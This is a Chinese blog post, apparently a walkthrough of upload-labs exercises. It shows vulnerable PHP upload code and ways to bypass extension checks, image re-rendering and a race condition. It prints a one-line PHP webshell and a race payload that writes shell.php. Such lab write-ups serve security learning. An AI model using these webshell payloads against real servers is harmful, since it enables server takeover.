文件上传漏洞案例

最新推荐文章于 2023-12-05 23:53:30 发布
最新推荐文章于 2023-12-05 23:53:30 发布
阅读量796 收藏
点赞数 2
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69435261/article/details/132673923
版权

目录

1.案例一

1)案例源码

2)创建web.php文件

3)使用抓包软件

2.案例二 

1)案例代码

2) 案例分析

3)copy命令生成图片马

 4)上传图片马到服务器

5)解析 文件图片

3.案例三

1)案例代码

2)绕过方法

3)上传木马,然后抓包

 4)持续发包

5)直接访问 

1.案例一

1)案例源码
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}
2)创建web.php文件

文件里面写入下面一行代码

<?php phpinfo(); ?>

然后上传该文件

就会发现格式不对,需要把后缀名改为.jpg。就会发现现在能上传文件,但是不能解析文件。

3)使用抓包软件

修改下面文件后缀为php就可以上传成功

2.案例二 

1)案例代码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}
2) 案例分析

exif_imagetype()读取一个图像的第一个字节并检查其后缀名。
返回值与getimage()函数返回的索引2相同,但是速度比getimage快得多。需要开启php_exif模块。

3)copy命令生成图片马

 4)上传图片马到服务器

5)解析 文件图片

3.案例三

1)案例代码
$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}
2)绕过方法

测试图片的渲染后没有修改的位置,将一句话木马添加进去,这样就可以利用文件包含去执行php一句话木马了

对于GIF 的上传,只需要判断没有修改的位置,然后将php一句话木马添加即可

对于PNG的上传,需要修改PLTE数据块或者修改IDAT数据块,

这里可以利用别人写好的脚本,将php一句话 <?=$_GET[0]($_POST[1])?>,一句话利用了php短开标签

3)上传木马,然后抓包

 4)持续发包

<?php fputs(fopen('../shell.php','w'),'<?php phpinfo();?>');?> 

5)直接访问 

沐芊屿
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
web网站文件上传漏洞和攻击-运维安全详细笔记
文件上传漏洞(全网最详细)
热门推荐
qq_61553520的博客
04-19 1万+
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
文件上传漏洞(带实例)
weixin_74790320的博客
12-05 575
现代互联网的Web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,如企业的OA系统,允许用户上传图片,视频,头像和许多其他类型的文件。然而向用户提供的功能越多,Web应用受到攻击的风险就越大,如果Web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞剑可执行脚本程序(WebShell)上传到服务器中,获得网站的权限,然后可以进一步对服务器进行入侵,扩大控制权限。
上传文件漏洞案例分析
Leon_Jinhai_Sun的博客
11-16 433
上传文件漏洞 漏洞描述 上传漏洞这个顾名思义,就是攻击者通过上传木马文件,直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 导致该漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。 漏洞危害 1)可以得到WEBSHELL 2)上传木马文件,可以导致系统瘫痪 Tomcat虚拟地址: F:\lear...
文件上传漏洞实例(upload-labs11-19)
whoim_i的博客
02-26 4339
目录前言pass-11(get00截断)pass-12(post 00截断)pass-13(图片马unpack)pass-14(getimagesize图片马)pass-15(exif_imagetype图片马)pass-16(二次渲染绕过)pass-17(条件竞争)pass-18(条件竞争)pass-19(./绕过)       &n...
文件上传漏洞
qq_36448110的博客
01-20 138
web安全--文件上传漏洞实例操作
u010625568的博客
06-28 650
1. 进入owasp靶机测试环境,进入dvwa,login登录名和密码都为admin2 2. 进入DVWA Security选择安全级别,首先选择低安全级别 3. 进入upload 可以选择右下角的view resource 查看后端源码可以上传文件的类型等,也可以进行安全等级的源码比较。低安全级别可以上传任何文件类型,并没有什么限制,这就可以上传mumawen文件等。 4. 选择中安全级别,限制了文件类型,只能上传image/jpeg类型文件,此时想要上传其他文件就需要其他工具进行协助。 .
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1848
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
文件上传漏洞详解
Ephemerally的博客
03-27 1478
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的。上传的文件可以是木马,病毒,恶意脚本等等。“文件上传”本身并没有任何问题,但是文件上传后,服务器怎么处理、解释文件就成了一个问题。如果服务器的处理逻辑做得不够安全,则会导致严重的后果。 常见的文件上传之后容易导致的安全问题: 上传的是Web脚本语言,服务器的Web容器解释...
本地靶场1-文件上传漏洞(二)-网络安全
gaogzhen的博客
02-24 5095
文章目录1、本地文件上传漏洞实例讲解1.1、pass01-前端js检测1.2、pass02-黑名单-MIME检测1.3、pass03-黑名单-特殊解析后缀1.4、pass04-黑名单-.htaccess解析漏洞1.5、pass05-黑名单-单过滤1.6、pass06-黑名单-大小写绕过1.7、pass07-黑名单-后缀名后加空格1.8、pass08-黑名单-后缀名后加点1.9、pass09-黑名单-::$DATA绕过1.10、pass10-同pass051.11、pass11-黑名单-双写绕过 1、本地文件
php命令注入绕过姿势,挖洞姿势:特殊的上传技巧,绕过PHP图片转换实现远程代码执行(RCE)...
weixin_42510600的博客
03-10 449
我使用了一个特殊的图片上传技巧,绕过PHP GD库对图片的转换处理,最终成功实现了远程代码执行。事情是这样的。当时我正在测试该网站上是否存在sql注入漏洞,不经意间我在网站个人页面发现了一个用于上传头像的文件上传表单。开始时我并没指望在上传功能处发现漏洞,但我决定试试。我上传了一个图片文件,通过截断http数据包,修改jpg图片的文件名后缀为php,然后继续上传。我惊讶的居然上传成功了,我几乎不敢...
渗透测试33---上传漏洞案例实战
初遇我ㄖ寸の热情呢?
04-14 7963
上传漏洞案例实战 文件上传漏洞原因分析 1.对于上传文件的后缀名没有做限制 一个是前端js没有做限制(前端的限制是不可靠的,是可以串改的) 还有就是后端没有做限制 2.对于上传文件的MIMETYPE没有做限制 后端没有对上传文件的类型没有做检查 HTTP协议规定了上传资源的时候在header上加文件的MIMETYPE,来识别文件的类型,这个动作是由浏览器完成的 名称叫做:...
GO语言Beego框架之WEB安全小系统(5)跨目录上传文件漏洞
陈小星的博客
09-11 5590
GO语言学习——用beego框架搭建WEB安全小系统(5)跨目录上传文件漏洞
文件上传漏洞 php,你不知道的文件上传漏洞php代码分析
weixin_28871885的博客
03-11 192
漏洞描述开发中文件上传功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护。文件处理一般包含两项功能,用户上传和展示文件,如上传头像。文件上传攻击示例upload.php?upload.html?上述代码未经过任何验证,恶意用户可以上传php文件,代码如下恶意用户可以通过访问 如http://server/uploads/shell.php?command=phpinfo(); 来执...
php 上传图片漏洞,ZwelL通用图片上传漏洞
weixin_39520988的博客
03-11 128
和大牛在奶茶厅喝奶茶的时候意外发现的。直接贴源码https://raw.githubusercontent.com/hardwork537/code/master/uploadimg.php让大家感受下/* * ****************************************************************************参数说明:$max_file_siz...
php 上传图片漏洞,phpcms图片上传漏洞解析
weixin_39638468的博客
03-11 347
?针对下法程序说明: Fileext函数是对文件后缀名的提?针对下法程序说明:Fileext函数是对文件后缀名的提取。根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。我们回到public function crop_upload() 函数中if(is_image...
文件上传漏洞注入案例
最新发布
06-04
文件上传漏洞是指攻击者通过在Web应用程序中上传恶意文件,从而绕过应用程序的安全机制,实现对目标服务器的攻击。具体的注入方式可以通过上传包含恶意代码的文件(如PHP脚本、木马程序等),从而在服务器上执行恶意代码,达到窃取敏感信息或控制服务器的目的。 一个常见的文件上传漏洞注入案例是通过上传一个包含恶意PHP代码的文件来实现攻击。攻击者将一个含有恶意代码的PHP文件伪装成普通文件(如图片、文档等),然后将其上传至目标服务器。一旦上传成功,攻击者就可以通过访问该文件来执行恶意代码,从而控制服务器、窃取敏感信息等。 另一个常见的案例是攻击者上传一个包含Shell脚本的文件,然后通过该脚本来实现对服务器的控制。攻击者可以使用Shell脚本来执行各种操作,例如添加用户、修改权限、下载文件等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值